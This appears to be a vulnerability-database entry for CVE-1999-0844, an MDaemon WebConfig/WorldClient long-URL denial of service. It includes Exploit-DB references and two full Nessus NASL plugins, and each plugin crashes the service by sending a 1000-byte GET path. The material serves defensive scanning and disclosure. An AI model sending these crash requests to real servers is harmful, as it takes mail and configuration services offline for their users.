CVE-1999-0844 - WebConfig Overflow DoS vulnerability in Deerfield Mdaemon 2.8.5/2.8.6
Metric | Value |
---|---|
Attack vector | NETWORK |
Attack complexity | LOW |
Privileges required | NONE |
Confidentiality impact | NONE |
Integrity impact | NONE |
Availability impact | PARTIAL |

Summary
Denial of service in MDaemon WorldClient and WebConfig services via a long URL.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 2 |
Exploit-DB
Field | Value |
---|---|
description | Alt-N MDaemon 2.8.5 0 WebConfig Overflow DoS Vulnerability. CVE-1999-0844. DoS exploit for Windows platform |
id | EDB-ID:19639 |
last seen | 2016-02-02 |
modified | 1999-11-24 |
published | 1999-11-24 |
reporter | Ussr Labs |
source | https://www.exploit-db.com/download/19639/ |
title | Alt-N MDaemon 2.8.5 - WebConfig Overflow DoS Vulnerability |

Field | Value |
---|---|
description | Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 Long URL DoS Vulnerability. CVE-1999-0844. DoS exploit for Windows platform |
id | EDB-ID:19640 |
last seen | 2016-02-02 |
modified | 1999-11-26 |
published | 1999-11-26 |
reporter | Ussr Labs |
source | https://www.exploit-db.com/download/19640/ |
title | Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL DoS Vulnerability |
Nessus
Field | Value |
---|---|
NASL family | Web Servers |
NASL id | MDAEMON_WEBCONFIG.NASL |
description | It was possible to crash Webconfig (which is used to configure MDaemon) by sending the request : `GET /aaaaa[...]aaa HTTP/1.0` This could allow a remote attacker to crash the web server, preventing the MDaemon server from being configured remotely. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 10138 |
published | 1999-11-24 |
reporter | This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/10138 |
title | MDaemon WebConfig HTTP Server URL Overflow DoS |

code

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(10138);
 script_version ("1.29");
 script_cve_id("CVE-1999-0844");
 script_bugtraq_id(820);

 script_name(english:"MDaemon WebConfig HTTP Server URL Overflow DoS");
 script_summary(english:"Crashes the remote service");

 script_set_attribute(
   attribute:"synopsis",
   value:"The remote web server has a denial of service vulnerability."
 );
 script_set_attribute(
   attribute:"description",
   value:
"It was possible to crash Webconfig (which is used to configure MDaemon) by sending the request : GET /aaaaa[...]aaa HTTP/1.0 This could allow a remote attacker to crash the web server, preventing the MDaemon server from being configured remotely."
 );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/1999/Nov/340"
 );
 script_set_attribute(
   attribute:"solution",
   value:"Upgrade to the latest version of this software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "1999/11/24");
 script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/24");
 script_cvs_date("Date: 2018/11/15 20:50:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_family(english:"Web Servers");
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_dependencie("http_version.nasl");
 script_require_ports(2002);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = 2002;

# Skip the check if the port is closed or the service is already unresponsive
if (! get_port_state(port)) exit(0, "Port "+port+" is closed");
if (http_is_dead(port:port)) exit(0, "The web server on port "+port+" is dead");

# Send a GET request whose path is 1000 bytes of filler (crap(1000))
w = http_send_recv3(method:"GET", item: crap(1000), port:port);

# Report the finding if the service no longer responds after the request
if (http_is_dead(port:port)) security_warning(port);
```

Field | Value |
---|---|
NASL family | Web Servers |
NASL id | MDAEMON_WORLDCLIENT.NASL |
description | It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending : `GET /aaaaa[...]aaa HTTP/1.0` This issue allows a remote attacker to prevent users from reading their email. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 10139 |
published | 1999-11-24 |
reporter | This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/10139 |
title | MDaemon WorldClient HTTP Server URL Overflow DoS |

code

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(10139);
 script_version ("1.29");
 script_cve_id("CVE-1999-0844");
 script_bugtraq_id(823);

 script_name(english:"MDaemon WorldClient HTTP Server URL Overflow DoS");
 script_summary(english:"Crashes the remote service");

 script_set_attribute(
   attribute:"synopsis",
   value:"The remote web server has a denial of service vulnerability."
 );
 script_set_attribute(
   attribute:"description",
   value:
"It was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending : GET /aaaaa[...]aaa HTTP/1.0 This issue allows a remote attacker to prevent users from reading their email."
 );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/1999/Nov/340"
 );
 script_set_attribute(
   attribute:"solution",
   value:"Upgrade to the latest version of this software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "1999/11/24");
 script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/24");
 script_cvs_date("Date: 2018/11/15 20:50:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_family(english:"Web Servers");
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_dependencie("http_version.nasl");
 script_require_ports(2000);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = 2000;

# Skip the check if the port is closed or the service is already unresponsive
if (! get_port_state(port)) exit(0, "Port "+port+" is closed");
if (http_is_dead(port:port)) exit(0, "The web server on port "+port+" is dead");

# Send a GET request whose path is 1000 bytes of filler (crap(1000))
w = http_send_recv3(method:"GET", port:port, item: crap(1000));

# Report the finding if the service no longer responds after the request
if (http_is_dead(port:port)) security_warning(port);
```